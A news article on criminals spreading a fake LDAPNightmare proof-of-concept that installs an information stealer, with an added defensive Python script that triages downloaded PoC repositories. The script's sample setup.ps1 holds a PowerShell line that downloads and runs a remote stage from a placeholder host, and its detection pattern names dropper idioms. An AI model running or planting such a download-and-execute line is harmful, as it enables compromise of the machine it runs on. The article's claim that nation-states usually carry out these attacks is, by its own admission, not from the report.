- Trend Micro Detects Malware Advertised as PoC Fork for Major Windows Vulnerability
- The malware acts as an information stealer, harvesting key system information.
- These types of attacks are usually carried out by nation-states.
Experts have warned that cybercriminals are targeting security researchers with fake proof-of-concept (PoC) exploits, trying to infect their computers with data-stealing malware.
Cybersecurity researchers at Trend Micro, who detected the new campaign in January 2025, noted that the criminals published a PoC for a popular, critical-severity vulnerability to draw the attention of the cybersecurity industry.
Researchers who downloaded the PoC for analysis would instead end up installing malware on their own machines.
Stealing vital information from the PC
In this particular case, the criminals advertised a fork of an existing, legitimate PoC for LDAPNightmare, a vulnerability disclosed in early January that consists of two flaws, CVE-2024-49112 and CVE-2024-49113.
The first serves as the bait here: it is a severity 9.8/10 flaw affecting Windows' Lightweight Directory Access Protocol (LDAP) implementation that allows remote code execution (RCE).
In her article, Trend Micro researcher Sarah Pearl Camiling said that “both vulnerabilities were considered very important due to the widespread use of LDAP in Windows environments.” Both flaws were fixed in December 2024, via the Patch Tuesday cumulative update.
In the fake PoC, the criminals replaced some of the legitimate files with an executable called "poc.exe". This would run a PowerShell script, which in turn would drop and run another script that steals data from the computer.
This is what the information stealer collects:
– Computer information
– Process list
– Directory listings (Downloads, Recents, Documents and Desktop)
– Network IP addresses
– Network adapters
– Installed updates
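The swap described above, a "poc.exe" binary dropped into what should be a source-only repository, is the kind of thing a researcher can catch before running anything. The following Python script is an added example written for this page, not code from Trend Micro's report or from the LDAPNightmare PoC: it walks a downloaded PoC directory and flags PE binaries (by the "MZ" magic, whatever the file is named), files with executable extensions, and scripts using common download-and-execute idioms. The sample repository it builds, including its file names and the placeholder URL, is constructed for the demonstration.

```python
"""Triage a downloaded PoC repository before running anything in it.

Added example, not part of the original article or the Trend Micro report.
Every path, file name and pattern below is an assumption made for the demo.
"""
import re
import tempfile
from pathlib import Path

# Extensions that should raise an eyebrow in a repository advertised as a PoC script.
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js"}
# Script types whose contents are worth a pattern scan.
SCRIPT_EXTENSIONS = {".ps1", ".bat", ".cmd", ".py"}
# Idioms commonly found in PowerShell droppers; a hit is a review flag, not proof of malice.
SUSPICIOUS_PS = re.compile(
    r"(Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|-EncodedCommand|FromBase64String)",
    re.IGNORECASE,
)


def triage_poc_dir(root):
    """Return lists of relative paths under three finding categories."""
    root = Path(root)
    findings = {"pe_binaries": [], "exec_extensions": [], "suspicious_scripts": []}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root))
        suffix = path.suffix.lower()
        # A PE executable starts with 'MZ' regardless of the extension it hides behind.
        with open(path, "rb") as fh:
            if fh.read(2) == b"MZ":
                findings["pe_binaries"].append(rel)
        if suffix in EXEC_EXTENSIONS:
            findings["exec_extensions"].append(rel)
        if suffix in SCRIPT_EXTENSIONS:
            text = path.read_text(errors="replace")
            if SUSPICIOUS_PS.search(text):
                findings["suspicious_scripts"].append(rel)
    return findings


def is_clean(findings):
    """True only when no category produced a finding."""
    return not any(findings.values())


def build_sample_repo():
    """Construct a hypothetical 'PoC fork' layout in a temp dir (sample data, not real files)."""
    root = Path(tempfile.mkdtemp(prefix="poc_triage_"))
    (root / "README.md").write_text("# LDAPNightmare PoC fork (constructed sample)\n")
    (root / "poc.py").write_text("import socket\nprint('harmless placeholder')\n")
    # A binary with a harmless-looking name and one with an 'exe' name, both PE by magic.
    (root / "helper.dat").write_bytes(b"MZ" + b"\x90" * 30)
    (root / "poc.exe").write_bytes(b"MZ" + b"\x00" * 62)
    # A PowerShell launcher using a download-and-execute idiom (placeholder .invalid host).
    (root / "setup.ps1").write_text(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')\n"
    )
    return str(root)


if __name__ == "__main__":
    sample = build_sample_repo()
    result = triage_poc_dir(sample)
    for category, paths in result.items():
        print(f"{category}: {paths}")
    print("clean" if is_clean(result) else "review before running")
```

Run it on a real clone by passing the checkout directory to `triage_poc_dir`; anything in `pe_binaries` deserves a look in an isolated analysis VM rather than on the researcher's workstation, and a content scan on the scripts is no substitute for reading them.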
This type of attack is nothing new: criminals have regularly been observed using the same tactics in the past.
Although the report does not suggest it, these types of attacks are often carried out by state actors attempting to gather intelligence on the cybersecurity practices of large technology companies, government organizations, critical infrastructure operators, and more.
Via The Register